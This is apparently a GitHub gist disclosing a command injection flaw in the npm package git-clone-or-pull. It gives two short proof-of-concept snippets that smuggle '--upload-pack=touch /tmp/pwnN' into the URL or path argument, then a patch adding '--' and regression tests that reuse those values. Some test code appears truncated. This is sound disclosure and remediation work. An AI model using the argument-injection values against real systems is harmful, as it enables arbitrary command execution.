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Last active August 10, 2022 09:38
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Command Injection vulnerability in git-clone-or-pull@2.0.1

Command Injection vulnerability in git-clone-or-pull@2.0.1

git-clone-or-pull describes itself as a tool to ensure a git repo exists on disk and that it's up-to-date.


Background on exploitation

I'm reporting a Command Injection vulnerability in git-clone-or-pull npm package.

A use of the --upload-pack feature of git is also supported for git clone, and allows users to execute arbitrary commands on the OS.

The source includes the use of the secure child process API spawn() (see here: however the outpath parameter passed to it may be a command line argument to the git clone command and result in arbitrary command injection.

If users are in control either of the url (url) to clone, or the directory path (outPath) to clone it to then the vulnerability applies.

New exploit

Install git-clone-or-pull@2.0.1, which is the latest.

POC 1:

const gitPullOrClone = require('git-pull-or-clone')
const repo = 'file:///tmp/zero12345'
const path = '--upload-pack=touch /tmp/pwn3'
gitPullOrClone(repo, path, (err) => {
  if (err) throw err

Observe a new file created: /tmp/pwn3

POC 2:

const gitPullOrClone = require('git-pull-or-clone')
const repo = '--upload-pack=touch /tmp/pwn4'
const path = 'file:///tmp/zero12345'
gitPullOrClone(repo, path, (err) => {
  if (err) throw err

Observe a new file created: /tmp/pwn4


Liran Tal

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lirantal commented Apr 1, 2022

Busy week on all fronts, Java and JavaScript! :D

Here's a patch for adding the relevant test cases and fixing the vulnerability per the above suggestion as pointed out in (1). You may choose to further harden it with ideas I shared in (2).

You can review the patch here and when you're good to be on stand-by for a quick merge and push a release I'd be happy to send a Pull Request over to the repo.

diff --git a/index.js b/index.js
index c38c84d..aa40114 100644
--- a/index.js
+++ b/index.js
@@ -28,7 +28,7 @@ function gitPullOrClone (url, outPath, opts, cb) {
   function gitClone () {
     // --depth implies --single-branch
     const flag = depth < Infinity ? '--depth=' + depth : '--single-branch'
-    const args = ['clone', flag, url, outPath]
+    const args = ['clone', flag, '--', url, outPath]
     debug('git ' + args.join(' '))
     spawn('git', args, {}, function (err) {
       if (err) err.message += ' (git clone) (' + url + ')'
diff --git a/test/basic.js b/test/basic.js
index 3e94f57..99c1b64 100644
--- a/test/basic.js
+++ b/test/basic.js
@@ -2,6 +2,7 @@ const gitPullOrClone = require('../')
 const path = require('path')
 const rimraf = require('rimraf')
 const test = require('tape')
+const fs = require('fs')
 const noop = () => {}
 const TMP_PATH = path.join(__dirname, '..', 'tmp')
@@ -41,3 +42,53 @@ test('git pull with invalid depth', (t) => {
     /The "depth" option must be greater than 0/
+test('git clone shouldnt allow command injection, via attack vector one', (t) => {
+  t.plan(2)
+  // clean up the tmp folder from prior tests
+  rimraf.sync(TMP_PATH)
+  // clone a repo into the tmp folder
+  gitPullOrClone(REPO_URL, OUT_PATH, (err) => {
+    t.error(err)
+  })
+  const OUT_TEST_FILE = '/tmp/pwn3'
+  const REPO_LOCAL_PATH = `file://${OUT_PATH}`
+  const OUT_PATH_INJECTION = `--upload-pack=touch ${OUT_TEST_FILE}`
+  console.log(REPO_LOCAL_PATH)
+    const exploitSucceeded = !!fs.existsSync(OUT_TEST_FILE)
+    t.error(exploitSucceeded, `${OUT_TEST_FILE} should not exist, potential security vulnerability detected`)
+    // cleanup the command injection test data
+    exploitSucceeded && rimraf.sync(OUT_TEST_FILE)
+  })
+test('git clone shouldnt allow command injection, via attack vector two', (t) => {
+  t.plan(2)
+  // clean up the tmp folder from prior tests
+  rimraf.sync(TMP_PATH)
+  // clone a repo into the tmp folder
+  gitPullOrClone(REPO_URL, OUT_PATH, (err) => {
+    t.error(err)
+  })
+  const OUT_TEST_FILE = '/tmp/pwn4'
+  const OUT_PATH_INJECTION = `file://${OUT_PATH}`
+  const REPO_LOCAL_PATH = `--upload-pack=touch ${OUT_TEST_FILE}`
+  console.log(REPO_LOCAL_PATH)
+    const exploitSucceeded = !!fs.existsSync(OUT_TEST_FILE)
+    t.error(exploitSucceeded, `${OUT_TEST_FILE} should not exist, potential security vulnerability detected`)
+    // cleanup the command injection test data
+    exploitSucceeded && rimraf.sync(OUT_TEST_FILE)
+  })

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